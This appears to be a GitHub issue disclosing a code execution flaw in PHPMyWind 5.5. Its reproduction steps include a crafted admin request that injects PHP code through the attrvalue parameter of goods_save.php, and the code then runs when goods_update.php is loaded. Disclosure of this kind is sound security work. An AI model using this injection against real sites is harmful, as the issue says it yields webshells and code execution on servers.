Skip to content

phpmywind5.5 Code Execution1 #4

@panghusec

Description

@panghusec

Attackers can get webshell or code execution

1.First download the phpmywind the Latest version from http://phpmywind.com/downloads/PHPMyWind_5.5.zip

2.install it

3.login as Admin

4.request http://localhost/admin/goods_save.php?action=add&attrid[]=1&attrvalue[]=2");phpinfo();//

5.then request http://localhost/admin/goods_update.php?id=2

3

In summary: from admin/goods_save.php Insert data into database and then from admin/goods_update.php enter the String2Array function and code execution :)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions